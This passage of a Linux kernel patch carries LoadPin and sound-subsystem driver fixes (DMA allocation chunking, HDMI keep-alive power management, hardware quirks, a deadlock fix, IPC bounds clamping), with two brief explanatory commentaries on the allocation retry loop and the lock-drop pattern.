++static int loadpin_read_file(struct file *file, enum kernel_read_file_id id,
++			     bool contents)
++{
++	/*
++	 * LoadPin only cares about the _origin_ of a file, not its
++	 * contents, so we can ignore the "are full contents available"
++	 * argument here.
++	 */
++	return loadpin_check(file, id);
++}
++
+ static int loadpin_load_data(enum kernel_load_data_id id, bool contents)
+ {
+-	return loadpin_read_file(NULL, (enum kernel_read_file_id) id, contents);
++	/*
++	 * LoadPin only cares about the _origin_ of a file, not its
++	 * contents, so a NULL file is passed, and we can ignore the
++	 * state of "contents".
++	 */
++	return loadpin_check(NULL, (enum kernel_read_file_id) id);
+ }
+ 
+ static struct security_hook_list loadpin_hooks[] __lsm_ro_after_init = {
+diff --git a/sound/core/memalloc.c b/sound/core/memalloc.c
+index ba095558b6d16..7268304009ada 100644
+--- a/sound/core/memalloc.c
++++ b/sound/core/memalloc.c
+@@ -720,7 +720,6 @@ static const struct snd_malloc_ops snd_dma_sg_wc_ops = {
+ struct snd_dma_sg_fallback {
+ 	size_t count;
+ 	struct page **pages;
+-	dma_addr_t *addrs;
+ };
+ 
+ static void __snd_dma_sg_fallback_free(struct snd_dma_buffer *dmab,
+@@ -732,38 +731,49 @@ static void __snd_dma_sg_fallback_free(struct snd_dma_buffer *dmab,
+ 	for (i = 0; i < sgbuf->count && sgbuf->pages[i]; i++)
+ 		do_free_pages(page_address(sgbuf->pages[i]), PAGE_SIZE, wc);
+ 	kvfree(sgbuf->pages);
+-	kvfree(sgbuf->addrs);
+ 	kfree(sgbuf);
+ }
+ 
+ static void *snd_dma_sg_fallback_alloc(struct snd_dma_buffer *dmab, size_t size)
+ {
+ 	struct snd_dma_sg_fallback *sgbuf;
+-	struct page **pages;
+-	size_t i, count;
++	struct page **pagep, *curp;
++	size_t chunk, npages;
++	dma_addr_t addr;
+ 	void *p;
+ 	bool wc = dmab->dev.type == SNDRV_DMA_TYPE_DEV_WC_SG_FALLBACK;
+ 
+ 	sgbuf = kzalloc(sizeof(*sgbuf), GFP_KERNEL);
+ 	if (!sgbuf)
+ 		return NULL;
+-	count = PAGE_ALIGN(size) >> PAGE_SHIFT;
+-	pages = kvcalloc(count, sizeof(*pages), GFP_KERNEL);
+-	if (!pages)
+-		goto error;
+-	sgbuf->pages = pages;
+-	sgbuf->addrs = kvcalloc(count, sizeof(*sgbuf->addrs), GFP_KERNEL);
+-	if (!sgbuf->addrs)
++	size = PAGE_ALIGN(size);
++	sgbuf->count = size >> PAGE_SHIFT;
++	sgbuf->pages = kvcalloc(sgbuf->count, sizeof(*sgbuf->pages), GFP_KERNEL);
++	if (!sgbuf->pages)
+ 		goto error;
+ 
+-	for (i = 0; i < count; sgbuf->count++, i++) {
+-		p = do_alloc_pages(dmab->dev.dev, PAGE_SIZE, &sgbuf->addrs[i], wc);
+-		if (!p)
+-			goto error;
+-		sgbuf->pages[i] = virt_to_page(p);
++	pagep = sgbuf->pages;
++	chunk = size;
++	while (size > 0) {
++		chunk = min(size, chunk);
++		p = do_alloc_pages(dmab->dev.dev, chunk, &addr, wc);
++		if (!p) {
++			if (chunk <= PAGE_SIZE)
++				goto error;
++			chunk >>= 1;
++			chunk = PAGE_SIZE << get_order(chunk);
++			continue;
++		}
++
++		size -= chunk;
++		/* fill pages */
++		npages = chunk >> PAGE_SHIFT;
++		curp = virt_to_page(p);
++		while (npages--)
++			*pagep++ = curp++;
+ 	}
+ 
+-	p = vmap(pages, count, VM_MAP, PAGE_KERNEL);
++	p = vmap(sgbuf->pages, sgbuf->count, VM_MAP, PAGE_KERNEL);
+ 	if (!p)
+ 		goto error;
+ 	dmab->private_data = sgbuf;
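
The memalloc.c rewrite replaces page-at-a-time allocation (plus the parallel addrs[] array, now unused and dropped) with opportunistic chunking: try the largest contiguous DMA allocation first, halve the chunk size on failure, and only give up when even a single page fails; each chunk then fans out into pages[] for the final vmap(). The retry loop reduced to its essentials, with try_alloc()/record_pages() hypothetical and sizes assumed page-aligned:

	#include <stddef.h>

	#define PAGE_SIZE 4096UL	/* illustrative */

	void *try_alloc(size_t bytes);			/* hypothetical */
	void record_pages(void *p, size_t bytes);	/* fills pages[] */

	static int alloc_chunked(size_t total)
	{
		size_t chunk = total;

		while (total > 0) {
			void *p;

			if (chunk > total)
				chunk = total;
			p = try_alloc(chunk);
			if (!p) {
				if (chunk <= PAGE_SIZE)
					return -1;	/* one page failed */
				chunk >>= 1;	/* retry smaller; the real
						 * code also rounds to a
						 * power-of-two page order */
				continue;
			}
			total -= chunk;
			record_pages(p, chunk);
		}

		return 0;
	}
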
+diff --git a/sound/core/pcm_native.c b/sound/core/pcm_native.c
+index 33769ca78cc8f..9238abbfb2d62 100644
+--- a/sound/core/pcm_native.c
++++ b/sound/core/pcm_native.c
+@@ -1432,8 +1432,10 @@ static int snd_pcm_do_start(struct snd_pcm_substream *substream,
+ static void snd_pcm_undo_start(struct snd_pcm_substream *substream,
+ 			       snd_pcm_state_t state)
+ {
+-	if (substream->runtime->trigger_master == substream)
++	if (substream->runtime->trigger_master == substream) {
+ 		substream->ops->trigger(substream, SNDRV_PCM_TRIGGER_STOP);
++		substream->runtime->stop_operating = true;
++	}
+ }
+ 
+ static void snd_pcm_post_start(struct snd_pcm_substream *substream,
+diff --git a/sound/drivers/mts64.c b/sound/drivers/mts64.c
+index d3bc9e8c407dc..f0d34cf70c3e0 100644
+--- a/sound/drivers/mts64.c
++++ b/sound/drivers/mts64.c
+@@ -815,6 +815,9 @@ static void snd_mts64_interrupt(void *private)
+ 	u8 status, data;
+ 	struct snd_rawmidi_substream *substream;
+ 
++	if (!mts)
++		return;
++
+ 	spin_lock(&mts->lock);
+ 	ret = mts64_read(mts->pardev->port);
+ 	data = ret & 0x00ff;
+diff --git a/sound/pci/asihpi/hpioctl.c b/sound/pci/asihpi/hpioctl.c
+index bb31b7fe867d6..477a5b4b50bcb 100644
+--- a/sound/pci/asihpi/hpioctl.c
++++ b/sound/pci/asihpi/hpioctl.c
+@@ -361,7 +361,7 @@ int asihpi_adapter_probe(struct pci_dev *pci_dev,
+ 		pci_dev->device, pci_dev->subsystem_vendor,
+ 		pci_dev->subsystem_device, pci_dev->devfn);
+ 
+-	if (pci_enable_device(pci_dev) < 0) {
++	if (pcim_enable_device(pci_dev) < 0) {
+ 		dev_err(&pci_dev->dev,
+ 			"pci_enable_device failed, disabling device\n");
+ 		return -EIO;
+diff --git a/sound/pci/hda/hda_codec.c b/sound/pci/hda/hda_codec.c
+index b4d1e658c5560..edd653ece70d7 100644
+--- a/sound/pci/hda/hda_codec.c
++++ b/sound/pci/hda/hda_codec.c
+@@ -2886,7 +2886,8 @@ static unsigned int hda_call_codec_suspend(struct hda_codec *codec)
+ 	snd_hdac_enter_pm(&codec->core);
+ 	if (codec->patch_ops.suspend)
+ 		codec->patch_ops.suspend(codec);
+-	hda_cleanup_all_streams(codec);
++	if (!codec->no_stream_clean_at_suspend)
++		hda_cleanup_all_streams(codec);
+ 	state = hda_set_power_state(codec, AC_PWRST_D3);
+ 	update_power_acct(codec, true);
+ 	snd_hdac_leave_pm(&codec->core);
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 21edf7a619f07..8015e44712678 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -1738,6 +1738,7 @@ static void silent_stream_enable(struct hda_codec *codec,
+ 
+ 	switch (spec->silent_stream_type) {
+ 	case SILENT_STREAM_KAE:
++		silent_stream_enable_i915(codec, per_pin);
+ 		silent_stream_set_kae(codec, per_pin, true);
+ 		break;
+ 	case SILENT_STREAM_I915:
+@@ -1975,6 +1976,7 @@ static int hdmi_add_cvt(struct hda_codec *codec, hda_nid_t cvt_nid)
+ static const struct snd_pci_quirk force_connect_list[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x870f, "HP", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x871a, "HP", 1),
++	SND_PCI_QUIRK(0x103c, 0x8711, "HP", 1),
+ 	SND_PCI_QUIRK(0x1462, 0xec94, "MS-7C94", 1),
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", 1),
+ 	{}
+@@ -2878,9 +2880,33 @@ static int i915_hsw_setup_stream(struct hda_codec *codec, hda_nid_t cvt_nid,
+ 				 hda_nid_t pin_nid, int dev_id, u32 stream_tag,
+ 				 int format)
+ {
++	struct hdmi_spec *spec = codec->spec;
++	int pin_idx = pin_id_to_pin_index(codec, pin_nid, dev_id);
++	struct hdmi_spec_per_pin *per_pin;
++	int res;
++
++	if (pin_idx < 0)
++		per_pin = NULL;
++	else
++		per_pin = get_pin(spec, pin_idx);
++
+ 	haswell_verify_D0(codec, cvt_nid, pin_nid);
+-	return hdmi_setup_stream(codec, cvt_nid, pin_nid, dev_id,
+-				 stream_tag, format);
++
++	if (spec->silent_stream_type == SILENT_STREAM_KAE && per_pin && per_pin->silent_stream) {
++		silent_stream_set_kae(codec, per_pin, false);
++		/* wait for pending transfers in codec to clear */
++		usleep_range(100, 200);
++	}
++
++	res = hdmi_setup_stream(codec, cvt_nid, pin_nid, dev_id,
++				stream_tag, format);
++
++	if (spec->silent_stream_type == SILENT_STREAM_KAE && per_pin && per_pin->silent_stream) {
++		usleep_range(100, 200);
++		silent_stream_set_kae(codec, per_pin, true);
++	}
++
++	return res;
+ }
+ 
+ /* pin_cvt_fixup ops override for HSW+ and VLV+ */
+@@ -2900,6 +2926,88 @@ static void i915_pin_cvt_fixup(struct hda_codec *codec,
+ 	}
+ }
+ 
++#ifdef CONFIG_PM
++static int i915_adlp_hdmi_suspend(struct hda_codec *codec)
++{
++	struct hdmi_spec *spec = codec->spec;
++	bool silent_streams = false;
++	int pin_idx, res;
++
++	res = generic_hdmi_suspend(codec);
++
++	for (pin_idx = 0; pin_idx < spec->num_pins; pin_idx++) {
++		struct hdmi_spec_per_pin *per_pin = get_pin(spec, pin_idx);
++
++		if (per_pin->silent_stream) {
++			silent_streams = true;
++			break;
++		}
++	}
++
++	if (silent_streams && spec->silent_stream_type == SILENT_STREAM_KAE) {
++		/*
++		 * stream-id should remain programmed when codec goes
++		 * to runtime suspend
++		 */
++		codec->no_stream_clean_at_suspend = 1;
++
++		/*
++		 * the system might go to S3, in which case keep-alive
++		 * must be reprogrammed upon resume
++		 */
++		codec->forced_resume = 1;
++
++		codec_dbg(codec, "HDMI: KAE active at suspend\n");
++	} else {
++		codec->no_stream_clean_at_suspend = 0;
++		codec->forced_resume = 0;
++	}
++
++	return res;
++}
++
++static int i915_adlp_hdmi_resume(struct hda_codec *codec)
++{
++	struct hdmi_spec *spec = codec->spec;
++	int pin_idx, res;
++
++	res = generic_hdmi_resume(codec);
++
++	/* KAE not programmed at suspend, nothing to do here */
++	if (!codec->no_stream_clean_at_suspend)
++		return res;
++
++	for (pin_idx = 0; pin_idx < spec->num_pins; pin_idx++) {
++		struct hdmi_spec_per_pin *per_pin = get_pin(spec, pin_idx);
++
++		/*
++		 * If the system was suspended with a monitor connected,
++		 * the codec settings may have been lost. Re-enable
++		 * keep-alive.
++		 */
++		if (per_pin->silent_stream) {
++			unsigned int param;
++
++			param = snd_hda_codec_read(codec, per_pin->cvt_nid, 0,
++						   AC_VERB_GET_CONV, 0);
++			if (!param) {
++				codec_dbg(codec, "HDMI: KAE: restore stream id\n");
++				silent_stream_enable_i915(codec, per_pin);
++			}
++
++			param = snd_hda_codec_read(codec, per_pin->cvt_nid, 0,
++						   AC_VERB_GET_DIGI_CONVERT_1, 0);
++			if (!(param & (AC_DIG3_KAE << 16))) {
++				codec_dbg(codec, "HDMI: KAE: restore DIG3_KAE\n");
++				silent_stream_set_kae(codec, per_pin, true);
++			}
++		}
++	}
++
++	return res;
++}
++#endif
++
+ /* precondition and allocation for Intel codecs */
+ static int alloc_intel_hdmi(struct hda_codec *codec)
+ {
+@@ -3030,8 +3138,14 @@ static int patch_i915_adlp_hdmi(struct hda_codec *codec)
+ 	if (!res) {
+ 		spec = codec->spec;
+ 
+-		if (spec->silent_stream_type)
++		if (spec->silent_stream_type) {
+ 			spec->silent_stream_type = SILENT_STREAM_KAE;
++
++#ifdef CONFIG_PM
++			codec->patch_ops.resume = i915_adlp_hdmi_resume;
++			codec->patch_ops.suspend = i915_adlp_hdmi_suspend;
++#endif
++		}
+ 	}
+ 
+ 	return res;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index cf7c825078dc7..f5f640851fdcb 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -10962,6 +10962,17 @@ static void alc897_fixup_lenovo_headset_mic(struct hda_codec *codec,
+ 	}
+ }
+ 
++static void alc897_fixup_lenovo_headset_mode(struct hda_codec *codec,
++				     const struct hda_fixup *fix, int action)
++{
++	struct alc_spec *spec = codec->spec;
++
++	if (action == HDA_FIXUP_ACT_PRE_PROBE) {
++		spec->parse_flags |= HDA_PINCFG_HEADSET_MIC;
++		spec->gen.hp_automute_hook = alc897_hp_automute_hook;
++	}
++}
++
+ static const struct coef_fw alc668_coefs[] = {
+ 	WRITE_COEF(0x01, 0xbebe), WRITE_COEF(0x02, 0xaaaa), WRITE_COEF(0x03,    0x0),
+ 	WRITE_COEF(0x04, 0x0180), WRITE_COEF(0x06,    0x0), WRITE_COEF(0x07, 0x0f80),
+@@ -11045,6 +11056,8 @@ enum {
+ 	ALC897_FIXUP_LENOVO_HEADSET_MIC,
+ 	ALC897_FIXUP_HEADSET_MIC_PIN,
+ 	ALC897_FIXUP_HP_HSMIC_VERB,
++	ALC897_FIXUP_LENOVO_HEADSET_MODE,
++	ALC897_FIXUP_HEADSET_MIC_PIN2,
+ };
+ 
+ static const struct hda_fixup alc662_fixups[] = {
+@@ -11471,6 +11484,19 @@ static const struct hda_fixup alc662_fixups[] = {
+ 			{ }
+ 		},
+ 	},
++	[ALC897_FIXUP_LENOVO_HEADSET_MODE] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc897_fixup_lenovo_headset_mode,
++	},
++	[ALC897_FIXUP_HEADSET_MIC_PIN2] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x1a, 0x01a11140 }, /* use as headset mic, without its own jack detect */
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC897_FIXUP_LENOVO_HEADSET_MODE
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+@@ -11523,6 +11549,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x32cb, "Lenovo ThinkCentre M70", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x32cf, "Lenovo ThinkCentre M950", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x32f7, "Lenovo ThinkCentre M90", ALC897_FIXUP_HEADSET_MIC_PIN),
++	SND_PCI_QUIRK(0x17aa, 0x3742, "Lenovo TianYi510Pro-14IOB", ALC897_FIXUP_HEADSET_MIC_PIN2),
+ 	SND_PCI_QUIRK(0x17aa, 0x38af, "Lenovo Ideapad Y550P", ALC662_FIXUP_IDEAPAD),
+ 	SND_PCI_QUIRK(0x17aa, 0x3a0d, "Lenovo Ideapad Y550", ALC662_FIXUP_IDEAPAD),
+ 	SND_PCI_QUIRK(0x1849, 0x5892, "ASRock B150M", ALC892_FIXUP_ASROCK_MOBO),
+diff --git a/sound/soc/amd/acp/acp-platform.c b/sound/soc/amd/acp/acp-platform.c
+index 85a81add4ef9f..447612a7a7627 100644
+--- a/sound/soc/amd/acp/acp-platform.c
++++ b/sound/soc/amd/acp/acp-platform.c
+@@ -184,10 +184,6 @@ static int acp_dma_open(struct snd_soc_component *component, struct snd_pcm_subs
+ 
+ 	stream->substream = substream;
+ 
+-	spin_lock_irq(&adata->acp_lock);
+-	list_add_tail(&stream->list, &adata->stream_list);
+-	spin_unlock_irq(&adata->acp_lock);
+-
+ 	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
+ 		runtime->hw = acp_pcm_hardware_playback;
+ 	else
+@@ -203,6 +199,10 @@ static int acp_dma_open(struct snd_soc_component *component, struct snd_pcm_subs
+ 
+ 	writel(1, ACP_EXTERNAL_INTR_ENB(adata));
+ 
++	spin_lock_irq(&adata->acp_lock);
++	list_add_tail(&stream->list, &adata->stream_list);
++	spin_unlock_irq(&adata->acp_lock);
++
+ 	return ret;
+ }
+ 
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index d9715bea965e1..1f0b5527c5949 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -213,6 +213,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Alienware m17 R5 AMD"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "TIMI"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Redmi Book Pro 14 2022"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/pcm512x.c b/sound/soc/codecs/pcm512x.c
+index 767463e82665c..89059a673cf09 100644
+--- a/sound/soc/codecs/pcm512x.c
++++ b/sound/soc/codecs/pcm512x.c
+@@ -1634,7 +1634,7 @@ int pcm512x_probe(struct device *dev, struct regmap *regmap)
+ 			if (val > 6) {
+ 				dev_err(dev, "Invalid pll-in\n");
+ 				ret = -EINVAL;
+-				goto err_clk;
++				goto err_pm;
+ 			}
+ 			pcm512x->pll_in = val;
+ 		}
+@@ -1643,7 +1643,7 @@ int pcm512x_probe(struct device *dev, struct regmap *regmap)
+ 			if (val > 6) {
+ 				dev_err(dev, "Invalid pll-out\n");
+ 				ret = -EINVAL;
+-				goto err_clk;
++				goto err_pm;
+ 			}
+ 			pcm512x->pll_out = val;
+ 		}
+@@ -1652,12 +1652,12 @@ int pcm512x_probe(struct device *dev, struct regmap *regmap)
+ 			dev_err(dev,
+ 				"Error: both pll-in and pll-out, or none\n");
+ 			ret = -EINVAL;
+-			goto err_clk;
++			goto err_pm;
+ 		}
+ 		if (pcm512x->pll_in && pcm512x->pll_in == pcm512x->pll_out) {
+ 			dev_err(dev, "Error: pll-in == pll-out\n");
+ 			ret = -EINVAL;
+-			goto err_clk;
++			goto err_pm;
+ 		}
+ 	}
+ #endif
+diff --git a/sound/soc/codecs/rt298.c b/sound/soc/codecs/rt298.c
+index a2ce52dafea84..cea26f3a02b6a 100644
+--- a/sound/soc/codecs/rt298.c
++++ b/sound/soc/codecs/rt298.c
+@@ -1166,6 +1166,13 @@ static const struct dmi_system_id force_combo_jack_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Geminilake")
+ 		}
+ 	},
++	{
++		.ident = "Intel Kabylake R RVP",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Kabylake Client platform")
++		}
++	},
+ 	{ }
+ };
+ 
+diff --git a/sound/soc/codecs/rt5670.c b/sound/soc/codecs/rt5670.c
+index ebac6caeb40ad..a230f441559a6 100644
+--- a/sound/soc/codecs/rt5670.c
++++ b/sound/soc/codecs/rt5670.c
+@@ -3311,8 +3311,6 @@ static int rt5670_i2c_probe(struct i2c_client *i2c)
+ 	if (ret < 0)
+ 		goto err;
+ 
+-	pm_runtime_put(&i2c->dev);
+-
+ 	return 0;
+ err:
+ 	pm_runtime_disable(&i2c->dev);
+diff --git a/sound/soc/codecs/wm8994.c b/sound/soc/codecs/wm8994.c
+index d3cfd3788f2ab..8fe9a75d12357 100644
+--- a/sound/soc/codecs/wm8994.c
++++ b/sound/soc/codecs/wm8994.c
+@@ -3853,7 +3853,12 @@ static irqreturn_t wm1811_jackdet_irq(int irq, void *data)
+ 	} else {
+ 		dev_dbg(component->dev, "Jack not detected\n");
+ 
++		/* Release wm8994->accdet_lock to avoid deadlock:
++		 * cancel_delayed_work_sync() takes wm8994->mic_work internal
++		 * lock and wm1811_mic_work takes wm8994->accdet_lock */
++		mutex_unlock(&wm8994->accdet_lock);
+ 		cancel_delayed_work_sync(&wm8994->mic_work);
++		mutex_lock(&wm8994->accdet_lock);
+ 
+ 		snd_soc_component_update_bits(component, WM8958_MICBIAS2,
+ 				    WM8958_MICB2_DISCH, WM8958_MICB2_DISCH);
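
The wm8994 fix breaks an AB-BA deadlock between the jack-detect IRQ thread and the mic work item: cancel_delayed_work_sync() blocks until the handler finishes, and the handler takes accdet_lock, so calling it with accdet_lock held can never complete. Dropping the lock around the synchronous cancel is the standard escape; in outline, with dev_priv as a hypothetical stand-in:

	#include <linux/mutex.h>
	#include <linux/workqueue.h>

	struct dev_priv {
		struct mutex lock;
		struct delayed_work work;	/* handler takes ->lock too */
	};

	static void stop_work_locked(struct dev_priv *p)
	{
		lockdep_assert_held(&p->lock);

		/* _sync() waits for the handler, and the handler takes
		 * p->lock: keeping the lock here would deadlock */
		mutex_unlock(&p->lock);
		cancel_delayed_work_sync(&p->work);
		mutex_lock(&p->lock);
	}

The caller must of course be prepared for state to have changed across the unlock window.
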
+diff --git a/sound/soc/codecs/wsa883x.c b/sound/soc/codecs/wsa883x.c
+index c7b10bbfba7ea..0ddb6362fcc52 100644
+--- a/sound/soc/codecs/wsa883x.c
++++ b/sound/soc/codecs/wsa883x.c
+@@ -7,7 +7,7 @@
+ #include <linux/debugfs.h>
+ #include <linux/delay.h>
+ #include <linux/device.h>
+-#include <linux/gpio.h>
++#include <linux/gpio/consumer.h>
+ #include <linux/init.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+@@ -1392,7 +1392,7 @@ static int wsa883x_probe(struct sdw_slave *pdev,
+ 	}
+ 
+ 	wsa883x->sd_n = devm_gpiod_get_optional(&pdev->dev, "powerdown",
+-						GPIOD_FLAGS_BIT_NONEXCLUSIVE);
++						GPIOD_FLAGS_BIT_NONEXCLUSIVE | GPIOD_OUT_HIGH);
+ 	if (IS_ERR(wsa883x->sd_n)) {
+ 		dev_err(&pdev->dev, "Shutdown Control GPIO not found\n");
+ 		ret = PTR_ERR(wsa883x->sd_n);
+@@ -1411,7 +1411,7 @@ static int wsa883x_probe(struct sdw_slave *pdev,
+ 	pdev->prop.simple_clk_stop_capable = true;
+ 	pdev->prop.sink_dpn_prop = wsa_sink_dpn_prop;
+ 	pdev->prop.scp_int1_mask = SDW_SCP_INT1_BUS_CLASH | SDW_SCP_INT1_PARITY;
+-	gpiod_direction_output(wsa883x->sd_n, 1);
++	gpiod_direction_output(wsa883x->sd_n, 0);
+ 
+ 	wsa883x->regmap = devm_regmap_init_sdw(pdev, &wsa883x_regmap_config);
+ 	if (IS_ERR(wsa883x->regmap)) {
+diff --git a/sound/soc/generic/audio-graph-card.c b/sound/soc/generic/audio-graph-card.c
+index fe7cf972d44ce..5daa824a4ffcf 100644
+--- a/sound/soc/generic/audio-graph-card.c
++++ b/sound/soc/generic/audio-graph-card.c
+@@ -485,8 +485,10 @@ static int __graph_for_each_link(struct asoc_simple_priv *priv,
+ 			of_node_put(codec_ep);
+ 			of_node_put(codec_port);
+ 
+-			if (ret < 0)
++			if (ret < 0) {
++				of_node_put(cpu_ep);
+ 				return ret;
++			}
+ 
+ 			codec_port_old = codec_port;
+ 		}
+diff --git a/sound/soc/intel/Kconfig b/sound/soc/intel/Kconfig
+index d2ca710ac3fa4..ac799de4f7fda 100644
+--- a/sound/soc/intel/Kconfig
++++ b/sound/soc/intel/Kconfig
+@@ -177,7 +177,7 @@ config SND_SOC_INTEL_SKYLAKE_COMMON
+ 	select SND_HDA_DSP_LOADER
+ 	select SND_SOC_TOPOLOGY
+ 	select SND_SOC_INTEL_SST
+-	select SND_SOC_HDAC_HDA if SND_SOC_INTEL_SKYLAKE_HDAUDIO_CODEC
++	select SND_SOC_HDAC_HDA
+ 	select SND_SOC_ACPI_INTEL_MATCH
+ 	select SND_INTEL_DSP_CONFIG
+ 	help
+diff --git a/sound/soc/intel/avs/boards/rt298.c b/sound/soc/intel/avs/boards/rt298.c
+index b28d36872dcba..58c9d9edecf0a 100644
+--- a/sound/soc/intel/avs/boards/rt298.c
++++ b/sound/soc/intel/avs/boards/rt298.c
+@@ -6,6 +6,7 @@
+ //          Amadeusz Slawinski <amadeuszx.slawinski@linux.intel.com>
+ //
+ 
++#include <linux/dmi.h>
+ #include <linux/module.h>
+ #include <sound/jack.h>
+ #include <sound/pcm.h>
+@@ -14,6 +15,16 @@
+ #include <sound/soc-acpi.h>
+ #include "../../../codecs/rt298.h"
+ 
++static const struct dmi_system_id kblr_dmi_table[] = {
++	{
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_BOARD_NAME, "Kabylake R DDR4 RVP"),
++		},
++	},
++	{}
++};
++
+ static const struct snd_kcontrol_new card_controls[] = {
+ 	SOC_DAPM_PIN_SWITCH("Headphone Jack"),
+ 	SOC_DAPM_PIN_SWITCH("Mic Jack"),
+@@ -96,9 +107,15 @@ avs_rt298_hw_params(struct snd_pcm_substream *substream, struct snd_pcm_hw_param
+ {
+ 	struct snd_soc_pcm_runtime *rtd = substream->private_data;
+ 	struct snd_soc_dai *codec_dai = asoc_rtd_to_codec(rtd, 0);
++	unsigned int clk_freq;
+ 	int ret;
+ 
+-	ret = snd_soc_dai_set_sysclk(codec_dai, RT298_SCLK_S_PLL, 19200000, SND_SOC_CLOCK_IN);
++	if (dmi_first_match(kblr_dmi_table))
++		clk_freq = 24000000;
++	else
++		clk_freq = 19200000;
++
++	ret = snd_soc_dai_set_sysclk(codec_dai, RT298_SCLK_S_PLL, clk_freq, SND_SOC_CLOCK_IN);
+ 	if (ret < 0)
+ 		dev_err(rtd->dev, "Set codec sysclk failed: %d\n", ret);
+ 
+@@ -139,7 +156,10 @@ static int avs_create_dai_link(struct device *dev, const char *platform_name, in
+ 	dl->platforms = platform;
+ 	dl->num_platforms = 1;
+ 	dl->id = 0;
+-	dl->dai_fmt = SND_SOC_DAIFMT_DSP_A | SND_SOC_DAIFMT_NB_NF | SND_SOC_DAIFMT_CBS_CFS;
++	if (dmi_first_match(kblr_dmi_table))
++		dl->dai_fmt = SND_SOC_DAIFMT_I2S | SND_SOC_DAIFMT_NB_NF | SND_SOC_DAIFMT_CBS_CFS;
++	else
++		dl->dai_fmt = SND_SOC_DAIFMT_DSP_A | SND_SOC_DAIFMT_NB_NF | SND_SOC_DAIFMT_CBS_CFS;
+ 	dl->init = avs_rt298_codec_init;
+ 	dl->be_hw_params_fixup = avs_rt298_be_fixup;
+ 	dl->ops = &avs_rt298_ops;
+diff --git a/sound/soc/intel/avs/core.c b/sound/soc/intel/avs/core.c
+index bb0719c58ca49..4f93639ce4887 100644
+--- a/sound/soc/intel/avs/core.c
++++ b/sound/soc/intel/avs/core.c
+@@ -440,7 +440,7 @@ static int avs_pci_probe(struct pci_dev *pci, const struct pci_device_id *id)
+ 	if (bus->mlcap)
+ 		snd_hdac_ext_bus_get_ml_capabilities(bus);
+ 
+-	if (!dma_set_mask_and_coherent(dev, DMA_BIT_MASK(64)))
++	if (dma_set_mask_and_coherent(dev, DMA_BIT_MASK(64)))
+ 		dma_set_mask_and_coherent(dev, DMA_BIT_MASK(32));
+ 	dma_set_max_seg_size(dev, UINT_MAX);
+ 
+diff --git a/sound/soc/intel/avs/ipc.c b/sound/soc/intel/avs/ipc.c
+index 020d85c7520de..306f0dc4eaf58 100644
+--- a/sound/soc/intel/avs/ipc.c
++++ b/sound/soc/intel/avs/ipc.c
+@@ -123,7 +123,10 @@ static void avs_dsp_recovery(struct avs_dev *adev)
+ 				if (!substream || !substream->runtime)
+ 					continue;
+ 
++				/* No need for _irq() as we are in nonatomic context. */
++				snd_pcm_stream_lock(substream);
+ 				snd_pcm_stop(substream, SNDRV_PCM_STATE_DISCONNECTED);
++				snd_pcm_stream_unlock(substream);
+ 			}
+ 		}
+ 	}
+@@ -192,7 +195,8 @@ static void avs_dsp_receive_rx(struct avs_dev *adev, u64 header)
+ 		/* update size in case of LARGE_CONFIG_GET */
+ 		if (msg.msg_target == AVS_MOD_MSG &&
+ 		    msg.global_msg_type == AVS_MOD_LARGE_CONFIG_GET)
+-			ipc->rx.size = msg.ext.large_config.data_off_size;
++			ipc->rx.size = min_t(u32, AVS_MAILBOX_SIZE,
++					     msg.ext.large_config.data_off_size);
+ 
+ 		memcpy_fromio(ipc->rx.data, avs_uplink_addr(adev), ipc->rx.size);
+ 		trace_avs_msg_payload(ipc->rx.data, ipc->rx.size);
+diff --git a/sound/soc/intel/boards/sof_es8336.c b/sound/soc/intel/boards/sof_es8336.c
+index 70713e4b07dc1..773e5d1d87d46 100644
+--- a/sound/soc/intel/boards/sof_es8336.c
++++ b/sound/soc/intel/boards/sof_es8336.c
+@@ -783,7 +783,7 @@ static int sof_es8336_remove(struct platform_device *pdev)
+ 	struct snd_soc_card *card = platform_get_drvdata(pdev);
+ 	struct sof_es8336_private *priv = snd_soc_card_get_drvdata(card);
+ 
+-	cancel_delayed_work(&priv->pcm_pop_work);
++	cancel_delayed_work_sync(&priv->pcm_pop_work);
+ 	gpiod_put(priv->gpio_speakers);
+ 	device_remove_software_node(priv->codec_dev);
+ 	put_device(priv->codec_dev);
+diff --git a/sound/soc/intel/skylake/skl.c b/sound/soc/intel/skylake/skl.c
+index 3312b57e3c0cb..7f058acd221f0 100644
+--- a/sound/soc/intel/skylake/skl.c
++++ b/sound/soc/intel/skylake/skl.c
